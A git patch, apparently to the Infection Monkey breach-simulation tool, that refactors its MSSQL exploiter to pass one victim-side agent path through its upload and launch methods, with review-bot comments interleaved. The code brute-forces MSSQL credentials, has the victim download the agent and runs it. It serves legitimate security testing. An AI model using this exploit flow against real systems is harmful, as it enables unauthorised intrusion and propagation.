From 51cfb73ce062980bf5ebf72fc3370304b667628e Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Wed, 23 Mar 2022 17:21:53 +0100
Subject: [PATCH] Agent: User random binary destination path for MSSQL Exploit
---
 monkey/infection_monkey/exploit/mssqlexec.py | 40 ++++++++++----------
 1 file changed, 21 insertions(+), 19 deletions(-)
diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index dbbc265f2..fb2b6f46e 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -1,5 +1,6 @@
 import logging
 import os
+from pathlib import Path
 from time import sleep
 import pymssql
@@ -59,6 +60,8 @@ class MSSQLExploiter(HostExploiter):
 Also, don't forget to start_monkey_server() before self.upload_monkey() and self.stop_monkey_server() after """
+ monkey_path_on_victim = get_agent_dest_path(self.host, self.options)
+
 # Brute force to get connection
 creds = generate_identity_secret_pairs(
 self.options["credentials"]["exploit_user_list"],
@@ -82,14 +85,14 @@ class MSSQLExploiter(HostExploiter):
 self.create_temp_dir()
 self.create_empty_payload_file()
- http_thread = self.start_monkey_server()
- self.upload_monkey()
+ http_thread = self.start_monkey_server(monkey_path_on_victim)
+ self.upload_monkey(monkey_path_on_victim)
 MSSQLExploiter._stop_monkey_server(http_thread)
 # Clear payload to pass in another command
 self.create_empty_payload_file()
- self.run_monkey()
+ self.run_monkey(monkey_path_on_victim)
 self.remove_temp_dir()
 except Exception as e:
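Review bot: The docstring ending just above the new `monkey_path_on_victim = get_agent_dest_path(self.host, self.options)` line still only states the call order of start_monkey_server()/upload_monkey()/stop_monkey_server(), but from here on those methods and run_monkey() also depend on receiving this one value, which is now computed a single time per exploit attempt instead of inside each of them. Extend that sentence to `Also, don't forget to start_monkey_server() before self.upload_monkey() and self.stop_monkey_server() after, and pass the same monkey_path_on_victim to start_monkey_server(), upload_monkey() and run_monkey().` so a later edit does not reintroduce a second get_agent_dest_path() call that yields a different path. The enclosing method starts before this hunk and continues past it.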
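Review bot: If `self.upload_monkey(monkey_path_on_victim)` raises, the server thread returned by `self.start_monkey_server(monkey_path_on_victim)` one line earlier never reaches `MSSQLExploiter._stop_monkey_server(http_thread)`, so the transfer listener started for this attempt is left running unless the `except Exception as e:` body (outside the hunk) stops it. Since these lines are being rewritten anyway, pair the stop with the start: `try: self.upload_monkey(monkey_path_on_victim)` / `finally: MSSQLExploiter._stop_monkey_server(http_thread)`, keeping the later `self.run_monkey(monkey_path_on_victim)` outside that block as it is now. The enclosing method starts and ends outside this hunk.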
@@ -129,8 +132,8 @@ class MSSQLExploiter(HostExploiter):
 raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
 self.run_mssql_commands(array_of_commands)
- def run_monkey(self):
- monkey_launch_command = self.get_monkey_launch_command()
+ def run_monkey(self, monkey_path_on_victim: Path):
+ monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
 self.run_mssql_command(monkey_launch_command)
 self.run_payload_file()
@@ -139,8 +142,8 @@ class MSSQLExploiter(HostExploiter):
 self.cursor.execute(cmd)
 sleep(MSSQLExploiter.QUERY_BUFFER)
- def upload_monkey(self):
- monkey_download_command = self.write_download_command_to_payload()
+ def upload_monkey(self, monkey_path_on_victim: Path):
+ monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
 self.run_payload_file()
 self.add_executed_cmd(monkey_download_command.command)
@@ -155,10 +158,9 @@ class MSSQLExploiter(HostExploiter):
 )
 self.run_mssql_command(tmp_dir_removal_command)
- def start_monkey_server(self) -> LockedHTTPServer:
- dst_path = get_agent_dest_path(self.host, self.options)
+ def start_monkey_server(self, monkey_path_on_victim: Path) -> LockedHTTPServer:
 self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
- self.host, dst_path, self.agent_repository
+ self.host, str(monkey_path_on_victim), self.agent_repository
 )
 return http_thread
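Review bot: `def run_monkey(self, monkey_path_on_victim: Path):` and, in the next hunk, `def upload_monkey(self, monkey_path_on_victim: Path):` gain a required positional parameter with no docstring saying what it has to be; from their bodies the path is baked into the launch command by get_monkey_launch_command and into the download command by write_download_command_to_payload, so the two calls only work together when handed the same value. Add a one-line docstring under each def, e.g. `"""Launch the agent previously uploaded to monkey_path_on_victim; must match the path given to upload_monkey()."""` and `"""Write and run the download command that stores the agent at monkey_path_on_victim."""`. The diffstat shows only this file changed, so any other caller of the old zero-argument forms would now raise TypeError; worth a grep before merging. Both methods are fully contained in their hunks, though this hunk's leading context (`raise Exception(...)`, `self.run_mssql_commands(array_of_commands)`) belongs to a method whose def is outside it.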
@@ -167,27 +169,27 @@ class MSSQLExploiter(HostExploiter):
 http_thread.stop()
 http_thread.join(LONG_REQUEST_TIMEOUT)
- def write_download_command_to_payload(self):
- monkey_download_command = self.get_monkey_download_command()
+ def write_download_command_to_payload(self, monkey_path_on_victim: Path):
+ monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
 self.run_mssql_command(monkey_download_command)
 return monkey_download_command
- def get_monkey_launch_command(self):
- dst_path = get_agent_dest_path(self.host, self.options)
+ def get_monkey_launch_command(self, monkey_path_on_victim: Path):
 # Form monkey's launch command
- monkey_args = build_monkey_commandline(self.host, self.current_depth - 1, dst_path)
+ monkey_args = build_monkey_commandline(
+ self.host, self.current_depth - 1, monkey_path_on_victim
+ )
 suffix = ">>{}".format(self.payload_file_path)
 prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
 return MSSQLLimitedSizePayload(
- command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
+ command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),
 prefix=prefix,
 suffix=suffix,
 )
- def get_monkey_download_command(self):
- dst_path = get_agent_dest_path(self.host, self.options)
+ def get_monkey_download_command(self, monkey_path_on_victim: Path):
 monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
- http_path=self.agent_http_path, dst_path=dst_path
+ http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
 )
 prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
 suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(
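Review bot: `get_monkey_launch_command` relies on implicit str() of the Path in `command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args)` and passes the Path object itself to `build_monkey_commandline(self.host, self.current_depth - 1, monkey_path_on_victim)`, whereas `get_monkey_download_command` in the same hunk and `start_monkey_server` in the previous hunk convert explicitly with `str(monkey_path_on_victim)`. Whether build_monkey_commandline accepts a Path is not visible here; the removed line passed whatever get_agent_dest_path returned, so if that was a str this is a silent type change for the helper. Use `str(monkey_path_on_victim)` in both places as well so the conversion policy is identical across the four call sites, and add a short docstring to each of the three methods naming the parameter. The hunk's leading context lines (`http_thread.stop()`, `http_thread.join(LONG_REQUEST_TIMEOUT)`) belong to a method whose def is outside the hunk, presumably _stop_monkey_server.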